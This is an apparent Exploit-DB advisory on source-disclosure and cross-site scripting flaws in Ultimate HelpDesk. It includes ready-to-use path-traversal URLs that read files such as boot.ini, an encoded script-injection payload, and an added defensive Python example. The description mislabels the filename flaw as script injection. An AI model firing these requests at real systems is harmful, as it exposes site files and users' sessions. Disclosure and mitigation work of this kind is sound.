Vendor: Ultimate HelpDesk
By: ajann
CVSS: 7.5 (HIGH)
Type: Source/XSS
CWE: 79
Product Name: Ultimate HelpDesk
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2006

Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities

Ultimate HelpDesk (all versions) allows an attacker to inject malicious input into the application, which can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. The issues lie in the 'filename' parameter of the 'getfile.asp' script and the 'keyword' parameter of the 'index.asp' script. Successful exploitation requires that the attacker knows the application's directory structure and is able to inject malicious input into the application.

Mitigation:

Input validation on the affected parameters ('filename' and 'keyword') should be used to prevent the execution of malicious code.
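As an added illustration of that mitigation (not code from Ultimate HelpDesk or from the advisory author), the block below shows the two checks a hardened handler would apply: the 'filename' parameter is allow-listed and then confirmed to resolve inside a fixed download directory, and the 'keyword' parameter is HTML-encoded before it is echoed back into the page. The download root, function names and sample inputs are assumptions made for the example; the traversal strings used as negative test inputs are the ones quoted in the advisory.

```python
"""Hardened handling for the two parameters named in the advisory.

Added example, not the product's own code. FILES_ROOT, the function
names and the sample inputs are assumptions for illustration.
"""
import html
import os
import re

# Hypothetical download directory; every served file must stay inside it.
FILES_ROOT = "/srv/helpdesk/files"

# Allow-list for a bare file name: alphanumerics, dot, underscore, dash,
# must start with an alphanumeric (so "..", ".htaccess" etc. are refused),
# no path separators of any kind.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


class InvalidFilename(ValueError):
    """Raised when the 'filename' parameter must not be served."""


def resolve_download(filename: str, root: str = FILES_ROOT) -> str:
    """Map a user-supplied 'filename' to an absolute path that is guaranteed
    to lie under `root`, or raise InvalidFilename.

    Two independent layers: an allow-list on the name itself, then a
    containment check on the resolved path (defence in depth: it also
    catches a symlink inside the root that points elsewhere).
    """
    if not SAFE_NAME.fullmatch(filename) or ".." in filename:
        raise InvalidFilename(f"rejected filename: {filename!r}")
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, filename))
    # Both paths are absolute here, so commonpath cannot raise.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise InvalidFilename(f"path escapes root: {candidate!r}")
    return candidate


def classify(filename: str) -> str:
    """Convenience wrapper: 'served' if the name passes both checks,
    'rejected' otherwise (useful for logging or a unit test table)."""
    try:
        resolve_download(filename)
    except InvalidFilename:
        return "rejected"
    return "served"


def render_keyword(keyword: str) -> str:
    """Return the HTML fragment that echoes the search term back to the
    user. Every HTML-significant character (& < > " ') is encoded, so the
    value can only ever be text inside the attribute, never markup."""
    safe = html.escape(keyword, quote=True)
    return f'<input type="text" name="keyword" value="{safe}">'


if __name__ == "__main__":
    # Constructed sample inputs: the two traversal strings from the advisory
    # plus one ordinary attachment name.
    for name in ("../index.asp", "../../../boot.ini", "report.pdf"):
        print(f"{name!r}: {classify(name)}")
    print(render_keyword("\"><script>alert('x');</script>"))
```

The containment check is deliberately kept even though the regex already refuses separators: the regex documents intent, while the `realpath`/`commonpath` comparison protects against cases the regex author did not think of.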

Exploit-DB raw data:

*******************************************************************************
# Title   :  Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
# Author  :   ajann
# Contact :   :(

*******************************************************************************

Login Before Vulnerabilities:


[[SOURCE]]]------------------------------------------------------

http://[target]/[path]//getfile.asp?filename=[SQL]

Example:

//getfile.asp?filename=../index.asp
//getfile.asp?filename=../../../boot.ini

[[/SOURCE]]]


[[XSS]]]---------------------------------------------------------

http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]

Example:

//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E

[[/XSS]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# I'm not Hacker!

# milw0rm.com [2006-12-01]